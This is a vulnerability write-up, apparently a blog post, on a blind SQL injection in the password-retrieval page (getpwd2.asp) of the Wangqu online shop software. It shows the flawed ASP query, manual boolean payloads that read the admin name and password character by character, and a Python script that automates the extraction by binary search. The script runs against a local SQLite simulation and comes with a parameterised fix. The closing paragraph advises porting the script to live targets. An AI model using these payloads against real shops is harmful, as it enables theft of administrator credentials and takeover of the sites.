Author: cnryan @ http://hi.baidu.com/cnryan
Wangqu Online Shopping System is a simple, powerful and widely used online shop platform. With years of R&D experience in online shopping systems, an increasingly complete feature set and a large user base, Wangqu's Online Shopping System has become the preferred brand for many users who run an online shop.
That is the official description.
The SQL injection is in the password-retrieval function. The latest version, 9.4, is vulnerable, and later tests showed that versions before v9.0 are vulnerable as well.
Vulnerability page: getpwd2.asp
Vulnerability code:
<%
' the posted user name is concatenated into the query; the quote character is never escaped
username = Request.Form("username")
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "select * from [user] where username='" & username & "'"
rs.Open SQL, conn, 1, 1
If rs.eof Then
%>
A textbook injection, the same as in the earlier Wangqu releases.
http://127.0.0.1/cnhww9.4/getpwd.asp
getpwd.asp is the password-retrieval page; the user name entered there is posted to getpwd2.asp. If the user name exists you are taken to step 2, otherwise the page exits with an error. That difference is the boolean oracle used below; test is a registered user name, so the only thing that decides between the two outcomes is the injected condition.
Enter: test' and 1=1 and ''='
Jumps to step 2 of getpwd2.asp
Enter: test' and 1=2 and ''='
Prompts that the user does not exist
Guess the table -> cnhww
test' and exists(select * from [admin]) and '1'='1    F
test' and exists(select * from [cnhww]) and '1'='1    T
Fields -> admin, password
test' and exists(select admin from [cnhww]) and '1'='1    T
test' and exists(select password from [cnhww]) and '1'='1    T
Values -->
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>97 and '1'='1    F
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1    T
97 = a
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>100 and '1'='1    F
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>99 and '1'='1    T
100 = d
......
test' and (select top 1 asc(mid(password,1,1)) from cnhww)>55 and '1'='1
......
......
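The probing above is done by hand, one threshold at a time. The script below is an added example, not part of the original post and not Wangqu's code: it automates the same boolean oracle with a binary search over the character code, so each character costs seven requests instead of up to 127. To run offline it replaces getpwd2.asp with a port of its logic over an in-memory SQLite database (standard-library sqlite3) seeded with constructed data. The table and column names cnhww, admin and password come from the post; the admin and password values, and test as the registered user name, are assumptions. SQLite has no asc, mid or top 1, so the probe uses unicode(substr(...)) and limit 1 as a stand-in; against the real Access backend you would send the post's asc(mid()) form with the same threshold logic. The hardened variant binds the user name as a parameter, which removes the differential the oracle depends on.

```python
import sqlite3

# Constructed seed data for the local simulation (assumed, not real Wangqu data).
SEED_ADMIN = "admin"
SEED_PASSWORD = "7a3f9c"


def make_db():
    """In-memory stand-in for the shop's Access database.  'test' is the
    registered user name the post's probes are prefixed with (assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table [user](username text)")
    conn.execute("insert into [user] values ('test')")
    conn.execute("create table cnhww(admin text, password text)")
    conn.execute("insert into cnhww values (?, ?)", (SEED_ADMIN, SEED_PASSWORD))
    conn.commit()
    return conn


def getpwd2_vulnerable(conn, username):
    """Port of getpwd2.asp: the posted user name is concatenated into the
    query.  True means rs.eof was False, i.e. the page goes on to step 2."""
    sql = "select * from [user] where username='" + username + "'"
    return conn.execute(sql).fetchone() is not None


def getpwd2_fixed(conn, username):
    """Same check with a bound parameter: the input is only ever a value."""
    sql = "select * from [user] where username=?"
    return conn.execute(sql, (username,)).fetchone() is not None


def gt_payload(column, table, pos, threshold):
    """Probe in the shape used in the post: is the character code at position
    `pos` of `column` greater than `threshold`?  Access (the real target)
    spells it  asc(mid(col,pos,1))  with  top 1;  the SQLite stand-in used
    here is  unicode(substr(col,pos,1))  with  limit 1."""
    return ("test' and (select unicode(substr(%s,%d,1)) from %s limit 1)>%d"
            " and '1'='1" % (column, pos, table, threshold))


def extract(oracle, column, table, max_len=32):
    """Binary-search every character (7 probes each instead of up to 127).
    Past the end of the value substr() is empty, unicode('') is NULL, every
    comparison is false and the search settles on 0, which ends the loop."""
    chars = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(gt_payload(column, table, pos, mid)):
                lo = mid + 1        # code is above mid
            else:
                hi = mid            # code is mid or below
        if lo == 0:
            break
        chars.append(chr(lo))
    return "".join(chars)


class CountingOracle:
    """Wraps a page function and counts the requests the attack needs."""

    def __init__(self, page, conn):
        self.page, self.conn, self.requests = page, conn, 0

    def __call__(self, username):
        self.requests += 1
        return self.page(self.conn, username)


def run_demo():
    """Runs the post's two step-2 probes and the full extraction against the
    vulnerable page, then the same attack against the parameterised page."""
    conn = make_db()
    vuln = CountingOracle(getpwd2_vulnerable, conn)
    fixed = CountingOracle(getpwd2_fixed, conn)
    return {
        "step2_true": vuln("test' and 1=1 and ''='"),
        "step2_false": vuln("test' and 1=2 and ''='"),
        "admin": extract(vuln, "admin", "cnhww"),
        "password": extract(vuln, "password", "cnhww"),
        "requests": vuln.requests,
        "fixed_step2": fixed("test' and 1=1 and ''='"),
        "fixed_admin": extract(fixed, "admin", "cnhww"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "=", value)
```

Two points worth keeping in mind when you port this to a live target: the prefix user name (test here) has to exist, or both branches return "user does not exist" and there is no oracle at all; and the terminator logic relies on the comparison against a NULL being false, which holds for Access as well, but if the column can contain characters above 127 widen the search range accordingly.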